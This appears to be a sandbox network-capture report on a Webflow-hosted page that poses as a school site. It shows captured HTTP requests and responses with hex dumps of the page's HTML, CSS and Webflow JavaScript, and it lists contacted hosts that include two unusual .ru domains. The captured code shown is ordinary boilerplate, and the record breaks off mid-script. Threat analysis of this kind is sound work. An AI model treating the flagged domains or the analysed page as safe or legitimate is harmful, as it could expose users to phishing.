                                                  • littlestownseniorhighschool.webflow.io
                                                    • cdn.prod.website-files.com
                                                    • d3e54v103j8qbb.cloudfront.net
                                                    • fgof.koxicarev.ru
                                                      • i8yr.viugbu.ru
                                                  • a.nel.cloudflare.com
                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  0192.168.2.449734104.18.36.2484435356C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  TimestampBytes transferredDirectionData
                                                  2025-03-28 12:42:41 UTC688OUTGET / HTTP/1.1
                                                  Host: littlestownseniorhighschool.webflow.io
                                                  Connection: keep-alive
                                                  sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                  sec-ch-ua-mobile: ?0
                                                  sec-ch-ua-platform: "Windows"
                                                  Upgrade-Insecure-Requests: 1
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                  Sec-Fetch-Site: none
                                                  Sec-Fetch-Mode: navigate
                                                  Sec-Fetch-User: ?1
                                                  Sec-Fetch-Dest: document
                                                  Accept-Encoding: gzip, deflate, br, zstd
                                                  Accept-Language: en-US,en;q=0.9
                                                  2025-03-28 12:42:41 UTC822INHTTP/1.1 200 OK
                                                  Date: Fri, 28 Mar 2025 12:42:41 GMT
                                                  Content-Type: text/html
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  CF-Ray: 92773577cf8cf25f-EWR
                                                  CF-Cache-Status: HIT
                                                  Age: 79578
                                                  Last-Modified: Thu, 27 Mar 2025 14:31:49 GMT
                                                  content-security-policy: frame-ancestors 'self' https://*.webflow.com http://*.webflow.com http://*.webflow.io http://webflow.com https://webflow.com
                                                  surrogate-control: max-age=2147483647
                                                  surrogate-key: littlestownseniorhighschool.webflow.io 67e2c79fd85ebcb1b252e594 pageId:67e2c79fd85ebcb1b252e59b
                                                  x-lambda-id: d49c02a3-5b60-4256-9cad-bafeb9355bf9
                                                  vary: Accept-Encoding
                                                  Set-Cookie: _cfuvid=W8ni1CvO9lPzdekwPEtSICWgPBx7ak.8yrEfxzt79zg-1743165761279-0.0.1.1-604800000; path=/; domain=.webflow.io; HttpOnly; Secure; SameSite=None
                                                  Server: cloudflare
                                                  alt-svc: h3=":443"; ma=86400
                                                  2025-03-28 12:42:41 UTC547INData Raw: 37 38 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 21 2d 2d 20 54 68 69 73 20 73 69 74 65 20 77 61 73 20 63 72 65 61 74 65 64 20 69 6e 20 57 65 62 66 6c 6f 77 2e 20 68 74 74 70 73 3a 2f 2f 77 65 62 66 6c 6f 77 2e 63 6f 6d 20 2d 2d 3e 3c 21 2d 2d 20 4c 61 73 74 20 50 75 62 6c 69 73 68 65 64 3a 20 54 75 65 20 4d 61 72 20 32 35 20 32 30 32 35 20 31 35 3a 31 33 3a 34 33 20 47 4d 54 2b 30 30 30 30 20 28 43 6f 6f 72 64 69 6e 61 74 65 64 20 55 6e 69 76 65 72 73 61 6c 20 54 69 6d 65 29 20 2d 2d 3e 3c 68 74 6d 6c 20 64 61 74 61 2d 77 66 2d 64 6f 6d 61 69 6e 3d 22 6c 69 74 74 6c 65 73 74 6f 77 6e 73 65 6e 69 6f 72 68 69 67 68 73 63 68 6f 6f 6c 2e 77 65 62 66 6c 6f 77 2e 69 6f 22 20 64 61 74 61 2d 77 66 2d 70 61 67 65 3d 22 36 37 65 32 63 37 39 66 64 38
                                                  Data Ascii: 786<!DOCTYPE html>... This site was created in Webflow. https://webflow.com -->... Last Published: Tue Mar 25 2025 15:13:43 GMT+0000 (Coordinated Universal Time) --><html data-wf-domain="littlestownseniorhighschool.webflow.io" data-wf-page="67e2c79fd8
                                                  2025-03-28 12:42:41 UTC1369INData Raw: 65 2d 66 69 6c 65 73 2e 63 6f 6d 2f 36 37 65 32 63 37 39 66 64 38 35 65 62 63 62 31 62 32 35 32 65 35 39 34 2f 63 73 73 2f 6c 69 74 74 6c 65 73 74 6f 77 6e 73 65 6e 69 6f 72 68 69 67 68 73 63 68 6f 6f 6c 2e 77 65 62 66 6c 6f 77 2e 37 65 33 65 32 30 61 34 62 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 2f 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 21 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 6e 3d 63 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2c 74 3d 22 20 77 2d 6d 6f 64 2d 22 3b 6e 2e 63 6c 61 73 73 4e 61 6d 65 2b 3d 74 2b 22 6a 73 22 2c 28 22 6f 6e 74 6f 75 63 68 73 74 61 72 74 22 69 6e 20 6f 7c 7c 6f 2e 44 6f 63 75
                                                  Data Ascii: e-files.com/67e2c79fd85ebcb1b252e594/css/littlestownseniorhighschool.webflow.7e3e20a4b.css" rel="stylesheet" type="text/css"/><script type="text/javascript">!function(o,c){var n=c.documentElement,t=" w-mod-";n.className+=t+"js",("ontouchstart"in o||o.Docu
                                                  2025-03-28 12:42:41 UTC17INData Raw: 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                  Data Ascii: ></body></html>
                                                  2025-03-28 12:42:41 UTC5INData Raw: 30 0d 0a 0d 0a
                                                  Data Ascii: 0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  1192.168.2.449737104.18.160.1174435356C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  TimestampBytes transferredDirectionData
                                                  2025-03-28 12:42:41 UTC681OUTGET /67e2c79fd85ebcb1b252e594/css/littlestownseniorhighschool.webflow.7e3e20a4b.css HTTP/1.1
                                                  Host: cdn.prod.website-files.com
                                                  Connection: keep-alive
                                                  sec-ch-ua-platform: "Windows"
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                  sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                  sec-ch-ua-mobile: ?0
                                                  Accept: text/css,*/*;q=0.1
                                                  Sec-Fetch-Site: cross-site
                                                  Sec-Fetch-Mode: no-cors
                                                  Sec-Fetch-Dest: style
                                                  Sec-Fetch-Storage-Access: active
                                                  Referer: https://littlestownseniorhighschool.webflow.io/
                                                  Accept-Encoding: gzip, deflate, br, zstd
                                                  Accept-Language: en-US,en;q=0.9
                                                  2025-03-28 12:42:41 UTC631INHTTP/1.1 200 OK
                                                  Date: Fri, 28 Mar 2025 12:42:41 GMT
                                                  Content-Type: text/css
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  x-amz-id-2: OdhHrAKGhRXAkaG50aEOctqmdyth54dgIOa6kvgQXXyk6Me/9z3fEZ9FYxwk6IwRd0jNkr8n2t8=
                                                  x-amz-request-id: 6PSBGD08D7FP6T3C
                                                  Last-Modified: Tue, 25 Mar 2025 15:13:44 GMT
                                                  ETag: W/"ba87cc9163a5163dfacbb140e5f6063e"
                                                  x-amz-server-side-encryption: AES256
                                                  Cache-Control: public, max-age=31536000, immutable
                                                  x-amz-version-id: esqAqPwEw_inkNjLS.r0VYjfh46YjMCW
                                                  CF-Cache-Status: HIT
                                                  Age: 79578
                                                  Access-Control-Allow-Origin: *
                                                  Server: cloudflare
                                                  CF-RAY: 9277357b4e9d0c76-EWR
                                                  alt-svc: h3=":443"; ma=86400
                                                  2025-03-28 12:42:41 UTC738INData Raw: 37 64 33 38 0d 0a 68 74 6d 6c 20 7b 0a 20 20 2d 77 65 62 6b 69 74 2d 74 65 78 74 2d 73 69 7a 65 2d 61 64 6a 75 73 74 3a 20 31 30 30 25 3b 0a 20 20 2d 6d 73 2d 74 65 78 74 2d 73 69 7a 65 2d 61 64 6a 75 73 74 3a 20 31 30 30 25 3b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 62 6f 64 79 20 7b 0a 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 7d 0a 0a 61 72 74 69 63 6c 65 2c 20 61 73 69 64 65 2c 20 64 65 74 61 69 6c 73 2c 20 66 69 67 63 61 70 74 69 6f 6e 2c 20 66 69 67 75 72 65 2c 20 66 6f 6f 74 65 72 2c 20 68 65 61 64 65 72 2c 20 68 67 72 6f 75 70 2c 20 6d 61 69 6e 2c 20 6d 65 6e 75 2c 20 6e 61 76 2c 20 73 65 63 74 69 6f 6e 2c 20 73 75 6d 6d 61 72 79 20 7b 0a 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 7d 0a
                                                  Data Ascii: 7d38html { -webkit-text-size-adjust: 100%; -ms-text-size-adjust: 100%; font-family: sans-serif;}body { margin: 0;}article, aside, details, figcaption, figure, footer, header, hgroup, main, menu, nav, section, summary { display: block;}
                                                  2025-03-28 12:42:41 UTC1369INData Raw: 38 30 25 3b 0a 7d 0a 0a 73 75 62 2c 20 73 75 70 20 7b 0a 20 20 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 62 61 73 65 6c 69 6e 65 3b 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 37 35 25 3b 0a 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 30 3b 0a 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0a 7d 0a 0a 73 75 70 20 7b 0a 20 20 74 6f 70 3a 20 2d 2e 35 65 6d 3b 0a 7d 0a 0a 73 75 62 20 7b 0a 20 20 62 6f 74 74 6f 6d 3a 20 2d 2e 32 35 65 6d 3b 0a 7d 0a 0a 69 6d 67 20 7b 0a 20 20 62 6f 72 64 65 72 3a 20 30 3b 0a 7d 0a 0a 73 76 67 3a 6e 6f 74 28 3a 72 6f 6f 74 29 20 7b 0a 20 20 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 0a 7d 0a 0a 68 72 20 7b 0a 20 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 0a 20 20 68
                                                  Data Ascii: 80%;}sub, sup { vertical-align: baseline; font-size: 75%; line-height: 0; position: relative;}sup { top: -.5em;}sub { bottom: -.25em;}img { border: 0;}svg:not(:root) { overflow: hidden;}hr { box-sizing: content-box; h
                                                  2025-03-28 12:42:41 UTC1369INData Raw: 72 2d 73 70 61 63 69 6e 67 3a 20 30 3b 0a 7d 0a 0a 74 64 2c 20 74 68 20 7b 0a 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 7d 0a 0a 40 66 6f 6e 74 2d 66 61 63 65 20 7b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 77 65 62 66 6c 6f 77 2d 69 63 6f 6e 73 3b 0a 20 20 73 72 63 3a 20 75 72 6c 28 22 64 61 74 61 3a 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 66 6f 6e 74 2d 74 74 66 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3b 62 61 73 65 36 34 2c 41 41 45 41 41 41 41 4c 41 49 41 41 41 77 41 77 54 31 4d 76 4d 67 38 53 42 69 55 41 41 41 43 38 41 41 41 41 59 47 4e 74 59 58 44 70 50 2b 61 34 41 41 41 42 48 41 41 41 41 46 78 6e 59 58 4e 77 41 41 41 41 45 41 41 41 41 58 67 41 41 41 41 49 5a 32 78 35 5a 6d 68 53 32 58 45 41 41 41 47 41 41 41 41 44 48 47 68 6c 59 57 51 54
                                                  Data Ascii: r-spacing: 0;}td, th { padding: 0;}@font-face { font-family: webflow-icons; src: url("data:application/x-font-ttf;charset=utf-8;base64,AAEAAAALAIAAAwAwT1MvMg8SBiUAAAC8AAAAYGNtYXDpP+a4AAABHAAAAFxnYXNwAAAAEAAAAXgAAAAIZ2x5ZmhS2XEAAAGAAAADHGhlYWQT
                                                  2025-03-28 12:42:41 UTC1369INData Raw: 45 67 62 30 74 4b 56 56 56 4b 53 32 38 67 49 53 45 67 62 30 74 4b 56 56 56 4b 53 32 38 67 49 51 41 42 41 41 41 42 77 41 49 41 41 38 41 41 45 67 41 41 45 7a 51 33 50 67 45 33 4e 6a 4d 78 46 53 49 48 44 67 45 48 42 68 55 78 49 77 41 6f 4b 49 74 65 58 57 70 56 53 6b 74 76 49 43 46 6d 41 63 42 71 58 56 36 4c 4b 43 68 6d 49 53 42 76 53 30 70 56 41 41 41 41 41 67 41 41 2f 38 41 46 74 67 50 41 41 44 49 41 4f 67 41 41 41 52 59 58 48 67 45 58 46 68 55 55 42 77 34 42 42 77 59 48 49 78 55 68 49 69 63 75 41 53 63 6d 4e 54 51 33 50 67 45 33 4e 6a 4d 78 4f 41 45 78 4e 44 63 2b 41 54 63 32 4d 7a 49 58 48 67 45 58 46 68 63 56 41 54 4d 4a 41 54 4d 56 4d 7a 55 45 6a 44 38 33 4e 6c 41 58 46 78 59 58 54 6a 55 31 50 51 4c 38 6b 7a 30 31 4e 6b 38 58 46 78 63 58 54 7a 59 31 50
                                                  Data Ascii: Egb0tKVVVKS28gISEgb0tKVVVKS28gIQABAAABwAIAA8AAEgAAEzQ3PgE3NjMxFSIHDgEHBhUxIwAoKIteXWpVSktvICFmAcBqXV6LKChmISBvS0pVAAAAAgAA/8AFtgPAADIAOgAAARYXHgEXFhUUBw4BBwYHIxUhIicuAScmNTQ3PgE3NjMxOAExNDc+ATc2MzIXHgEXFhcVATMJATMVMzUEjD83NlAXFxYXTjU1PQL8kz01Nk8XFxcXTzY1P
                                                  2025-03-28 12:42:41 UTC1369INData Raw: 22 5d 2c 20 5b 63 6c 61 73 73 2a 3d 22 20 77 2d 69 63 6f 6e 2d 22 5d 20 7b 0a 20 20 73 70 65 61 6b 3a 20 6e 6f 6e 65 3b 0a 20 20 66 6f 6e 74 2d 76 61 72 69 61 6e 74 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 20 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 20 6e 6f 6e 65 3b 0a 20 20 2d 77 65 62 6b 69 74 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 20 61 6e 74 69 61 6c 69 61 73 65 64 3b 0a 20 20 2d 6d 6f 7a 2d 6f 73 78 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 20 67 72 61 79 73 63 61 6c 65 3b 0a 20 20 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 3b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 77 65 62 66 6c 6f 77 2d 69 63 6f
                                                  Data Ascii: "], [class*=" w-icon-"] { speak: none; font-variant: normal; text-transform: none; -webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale; font-style: normal; font-weight: normal; line-height: 1; font-family: webflow-ico
                                                  2025-03-28 12:42:41 UTC1369INData Raw: 72 2d 72 61 64 69 75 73 3a 20 30 3b 0a 20 20 70 61 64 64 69 6e 67 3a 20 39 70 78 20 31 35 70 78 3b 0a 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 0a 7d 0a 0a 69 6e 70 75 74 2e 77 2d 62 75 74 74 6f 6e 20 7b 0a 20 20 2d 77 65 62 6b 69 74 2d 61 70 70 65 61 72 61 6e 63 65 3a 20 62 75 74 74 6f 6e 3b 0a 7d 0a 0a 68 74 6d 6c 5b 64 61 74 61 2d 77 2d 64 79 6e 70 61 67 65 5d 20 5b 64 61 74 61 2d 77 2d 63 6c 6f 61 6b 5d 20 7b 0a 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 7d 0a 0a 2e 77 2d 63 6f 64 65 2d 62 6c 6f 63 6b 20 7b 0a 20 20 6d 61 72 67 69 6e 3a 20 75 6e 73 65 74 3b 0a 7d 0a 0a 70 72 65 2e 77 2d 63 6f 64 65 2d 62 6c 6f
                                                  Data Ascii: r-radius: 0; padding: 9px 15px; text-decoration: none; display: inline-block;}input.w-button { -webkit-appearance: button;}html[data-w-dynpage] [data-w-cloak] { color: #0000 !important;}.w-code-block { margin: unset;}pre.w-code-blo
                                                  2025-03-28 12:42:41 UTC1369INData Raw: 73 65 74 3b 0a 20 20 77 6f 72 64 2d 77 72 61 70 3a 20 75 6e 73 65 74 3b 0a 20 20 74 72 61 6e 73 69 74 69 6f 6e 3a 20 75 6e 73 65 74 3b 0a 7d 0a 0a 2e 77 2d 77 65 62 66 6c 6f 77 2d 62 61 64 67 65 20 7b 0a 20 20 77 68 69 74 65 2d 73 70 61 63 65 3a 20 6e 6f 77 72 61 70 3b 0a 20 20 63 75 72 73 6f 72 3a 20 70 6f 69 6e 74 65 72 3b 0a 20 20 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 30 20 30 20 31 70 78 20 23 30 30 30 30 30 30 31 61 2c 20 30 20 31 70 78 20 33 70 78 20 23 30 30 30 30 30 30 31 61 3b 0a 20 20 76 69 73 69 62 69 6c 69 74 79 3a 20 76 69 73 69 62 6c 65 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 20 20 6f 70 61 63 69 74 79 3a 20 31 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 20 20 7a 2d 69 6e 64 65 78 3a 20 32 31 34 37 34 38 33 36 34 37 20 21 69 6d 70 6f 72 74 61
                                                  Data Ascii: set; word-wrap: unset; transition: unset;}.w-webflow-badge { white-space: nowrap; cursor: pointer; box-shadow: 0 0 0 1px #0000001a, 0 1px 3px #0000001a; visibility: visible !important; opacity: 1 !important; z-index: 2147483647 !importa
                                                  2025-03-28 12:42:41 UTC1369INData Raw: 2d 68 65 69 67 68 74 3a 20 31 38 70 78 3b 0a 7d 0a 0a 70 20 7b 0a 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 30 3b 0a 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 31 30 70 78 3b 0a 7d 0a 0a 62 6c 6f 63 6b 71 75 6f 74 65 20 7b 0a 20 20 62 6f 72 64 65 72 2d 6c 65 66 74 3a 20 35 70 78 20 73 6f 6c 69 64 20 23 65 32 65 32 65 32 3b 0a 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 30 70 78 3b 0a 20 20 70 61 64 64 69 6e 67 3a 20 31 30 70 78 20 32 30 70 78 3b 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 38 70 78 3b 0a 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 32 70 78 3b 0a 7d 0a 0a 66 69 67 75 72 65 20 7b 0a 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 30 70 78 3b 0a 7d 0a 0a 66 69 67 63 61 70 74 69 6f 6e 20 7b 0a 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a
                                                  Data Ascii: -height: 18px;}p { margin-top: 0; margin-bottom: 10px;}blockquote { border-left: 5px solid #e2e2e2; margin: 0 0 10px; padding: 10px 20px; font-size: 18px; line-height: 22px;}figure { margin: 0 0 10px;}figcaption { text-align:
                                                  2025-03-28 12:42:41 UTC1369INData Raw: 3a 20 33 38 70 78 3b 0a 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 31 30 70 78 3b 0a 20 20 70 61 64 64 69 6e 67 3a 20 38 70 78 20 31 32 70 78 3b 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 3b 0a 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 7d 0a 0a 2e 77 2d 69 6e 70 75 74 3a 3a 70 6c 61 63 65 68 6f 6c 64 65 72 2c 20 2e 77 2d 73 65 6c 65 63 74 3a 3a 70 6c 61 63 65 68 6f 6c 64 65 72 20 7b 0a 20 20 63 6f 6c 6f 72 3a 20 23 39 39 39 3b 0a 7d 0a 0a 2e 77 2d 69 6e 70 75 74 3a 66 6f 63 75 73 2c 20 2e 77 2d 73 65 6c 65 63 74 3a 66 6f 63 75 73 20 7b 0a 20 20 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 33 38 39 38 65 63 3b 0a 20 20 6f 75 74 6c 69 6e 65 3a 20 30 3b 0a
                                                  Data Ascii: : 38px; margin-bottom: 10px; padding: 8px 12px; font-size: 14px; line-height: 1.42857; display: block;}.w-input::placeholder, .w-select::placeholder { color: #999;}.w-input:focus, .w-select:focus { border-color: #3898ec; outline: 0;
                                                  2025-03-28 12:42:41 UTC1369INData Raw: 20 2e 31 70 78 3b 0a 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 0a 7d 0a 0a 2e 77 2d 66 69 6c 65 2d 75 70 6c 6f 61 64 2d 64 65 66 61 75 6c 74 2c 20 2e 77 2d 66 69 6c 65 2d 75 70 6c 6f 61 64 2d 75 70 6c 6f 61 64 69 6e 67 2c 20 2e 77 2d 66 69 6c 65 2d 75 70 6c 6f 61 64 2d 73 75 63 63 65 73 73 20 7b 0a 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 20 20 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 0a 7d 0a 0a 2e 77 2d 66 69 6c 65 2d 75 70 6c 6f 61 64 2d 65 72 72 6f 72 20 7b 0a 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 31 30 70 78 3b 0a 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 7d 0a 0a 2e 77 2d 66 69 6c 65 2d 75 70 6c 6f 61 64 2d 64 65 66 61 75 6c
                                                  Data Ascii: .1px; position: absolute; overflow: hidden;}.w-file-upload-default, .w-file-upload-uploading, .w-file-upload-success { color: #333; display: inline-block;}.w-file-upload-error { margin-top: 10px; display: block;}.w-file-upload-defaul


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  2192.168.2.449738104.18.160.1174435356C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  TimestampBytes transferredDirectionData
                                                  2025-03-28 12:42:41 UTC653OUTGET /67e2c79fd85ebcb1b252e594/js/webflow.751e0867.f68fe005672cde30.js HTTP/1.1
                                                  Host: cdn.prod.website-files.com
                                                  Connection: keep-alive
                                                  sec-ch-ua-platform: "Windows"
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                  sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                  sec-ch-ua-mobile: ?0
                                                  Accept: */*
                                                  Sec-Fetch-Site: cross-site
                                                  Sec-Fetch-Mode: no-cors
                                                  Sec-Fetch-Dest: script
                                                  Sec-Fetch-Storage-Access: active
                                                  Referer: https://littlestownseniorhighschool.webflow.io/
                                                  Accept-Encoding: gzip, deflate, br, zstd
                                                  Accept-Language: en-US,en;q=0.9
                                                  2025-03-28 12:42:41 UTC654INHTTP/1.1 200 OK
                                                  Date: Fri, 28 Mar 2025 12:42:41 GMT
                                                  Content-Type: text/javascript
                                                  Content-Length: 36033
                                                  Connection: close
                                                  x-amz-id-2: Zg0KoARx2A86U7Nc3DFhugRfqHF7bkKcOmDwwhU/TfXV61uCOhZ8wm5Jzhph/eAMNNLscZ0VXfw=
                                                  x-amz-request-id: 7E5D5M7EGVCFHVDN
                                                  Last-Modified: Tue, 25 Mar 2025 15:13:44 GMT
                                                  ETag: "c2baeb117caff557b76166e9bf46d467"
                                                  x-amz-server-side-encryption: AES256
                                                  Cache-Control: public, max-age=31536000, immutable
                                                  x-amz-version-id: VzksEbqW1V55ogUBazX2C76KjobfM5cV
                                                  CF-Cache-Status: HIT
                                                  Age: 250132
                                                  Accept-Ranges: bytes
                                                  Access-Control-Allow-Origin: *
                                                  Server: cloudflare
                                                  CF-RAY: 9277357b4f6d43c1-EWR
                                                  alt-svc: h3=":443"; ma=86400
                                                  2025-03-28 12:42:41 UTC715INData Raw: 28 28 29 3d 3e 7b 76 61 72 20 74 3d 7b 34 38 37 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 77 69 6e 64 6f 77 2e 74 72 61 6d 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 75 6e 63 74 69 6f 6e 20 65 28 74 2c 65 29 7b 72 65 74 75 72 6e 28 6e 65 77 20 43 2e 42 61 72 65 29 2e 69 6e 69 74 28 74 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 6e 28 74 29 7b 76 61 72 20 65 3d 70 61 72 73 65 49 6e 74 28 74 2e 73 6c 69 63 65 28 31 29 2c 31 36 29 3b 72 65 74 75 72 6e 5b 65 3e 3e 31 36 26 32 35 35 2c 65 3e 3e 38 26 32 35 35 2c 32 35 35 26 65 5d 7d 66 75 6e 63 74 69 6f 6e 20 69 28 74 2c 65 2c 6e 29 7b 72 65 74 75 72 6e 22 23 22 2b 28 30 78 31 30 30 30 30 30 30 7c 74 3c 3c 31 36 7c 65 3c 3c 38 7c 6e 29 2e 74 6f 53 74 72 69 6e 67 28 31 36 29 2e 73 6c
                                                  Data Ascii: (()=>{var t={487:function(){"use strict";window.tram=function(t){function e(t,e){return(new C.Bare).init(t,e)}function n(t){var e=parseInt(t.slice(1),16);return[e>>16&255,e>>8&255,255&e]}function i(t,e,n){return"#"+(0x1000000|t<<16|e<<8|n).toString(16).sl
                                                  2025-03-28 12:42:41 UTC1369INData Raw: 63 74 69 6f 6e 20 6c 28 29 7b 7d 75 3d 3d 3d 6e 26 26 28 75 3d 73 2c 73 3d 4f 62 6a 65 63 74 29 2c 63 2e 42 61 72 65 3d 6c 3b 76 61 72 20 66 2c 68 3d 6f 5b 74 5d 3d 73 5b 74 5d 2c 64 3d 6c 5b 74 5d 3d 63 5b 74 5d 3d 6e 65 77 20 6f 3b 72 65 74 75 72 6e 20 64 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 63 2c 63 2e 6d 69 78 69 6e 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6c 5b 74 5d 3d 63 5b 74 5d 3d 61 28 63 2c 65 29 5b 74 5d 2c 63 7d 2c 63 2e 6f 70 65 6e 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 69 66 28 66 3d 7b 7d 2c 72 28 74 29 3f 66 3d 74 2e 63 61 6c 6c 28 63 2c 64 2c 68 2c 63 2c 73 29 3a 69 28 74 29 26 26 28 66 3d 74 29 2c 69 28 66 29 29 66 6f 72 28 76 61 72 20 6e 20 69 6e 20 66 29 65 2e 63 61 6c 6c 28 66 2c 6e 29 26 26 28 64 5b 6e 5d 3d 66
                                                  Data Ascii: ction l(){}u===n&&(u=s,s=Object),c.Bare=l;var f,h=o[t]=s[t],d=l[t]=c[t]=new o;return d.constructor=c,c.mixin=function(e){return l[t]=c[t]=a(c,e)[t],c},c.open=function(t){if(f={},r(t)?f=t.call(c,d,h,c,s):i(t)&&(f=t),i(f))for(var n in f)e.call(f,n)&&(d[n]=f
                                                  2025-03-28 12:42:41 UTC1369INData Raw: 63 75 62 69 63 2d 62 65 7a 69 65 72 28 30 2e 36 34 35 2c 20 30 2e 30 34 35 2c 20 30 2e 33 35 35 2c 20 31 29 22 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 2c 69 29 7b 72 65 74 75 72 6e 28 74 2f 3d 69 2f 32 29 3c 31 3f 6e 2f 32 2a 74 2a 74 2a 74 2b 65 3a 6e 2f 32 2a 28 28 74 2d 3d 32 29 2a 74 2a 74 2b 32 29 2b 65 7d 5d 2c 22 65 61 73 65 2d 69 6e 2d 71 75 61 72 74 22 3a 5b 22 63 75 62 69 63 2d 62 65 7a 69 65 72 28 30 2e 38 39 35 2c 20 30 2e 30 33 30 2c 20 30 2e 36 38 35 2c 20 30 2e 32 32 30 29 22 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 2c 69 29 7b 72 65 74 75 72 6e 20 6e 2a 28 74 2f 3d 69 29 2a 74 2a 74 2a 74 2b 65 7d 5d 2c 22 65 61 73 65 2d 6f 75 74 2d 71 75 61 72 74 22 3a 5b 22 63 75 62 69 63 2d 62 65 7a 69 65 72 28 30 2e 31 36 35 2c 20 30 2e 38 34
